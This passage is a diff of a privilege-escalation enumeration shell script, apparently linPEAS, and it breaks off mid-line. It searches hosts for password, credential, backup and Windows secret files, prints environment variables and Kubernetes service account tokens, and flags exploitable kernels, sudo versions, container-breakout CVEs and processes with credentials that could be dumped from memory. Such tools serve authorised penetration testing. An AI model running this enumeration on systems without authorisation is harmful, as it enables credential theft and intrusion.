"$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) - - - ##### POST SERACH VARIABLES ##### - backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" - printf ${YELLOW}"DONE\n"$NC - echo "" -fi - - -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" - echo "" - - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no - else +else containerCounts="" if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + # List any running containers if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi +fi - #If docker - if echo "$containerType" | grep -qi "docker"; then +#If docker +if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -1444,30 +1573,40 @@ if echo $CHECKS | grep -q Container; then print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," fi if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker + print_2title "Docker Overlays" + df -h | grep docker fi - fi +fi - if [ "$inContainer" ]; then +if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" + print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi checkContainerExploits print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + + if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + print_2title "Kubernetes Information" + echo "" + + print_3title "Kubernetes service account folder" + ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null + echo "" + + print_3title "Kubernetes env vars" + (env | set) | grep -Ei "kubernetes|kube" + fi echo "" print_2title "Container Capabilities" @@ -1476,312 +1615,227 @@ if echo $CHECKS | grep -q Container; then print_2title "Privilege Mode" if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi else - echo_not_found + echo_not_found fi echo "" print_2title "Interesting Files Mounted" - grep -Ev "$GREP_IGNORE_MOUNTS" /proc/self/mountinfo | cut -d' ' -f 4- + (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," echo "" print_2title "Possible Entrypoints" ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo "" - fi +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then +print_title "Processes, Crons, Timers, Services and Sockets" + +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) +else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi + done + pslist=$(ps auxwww) + echo "" + + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} 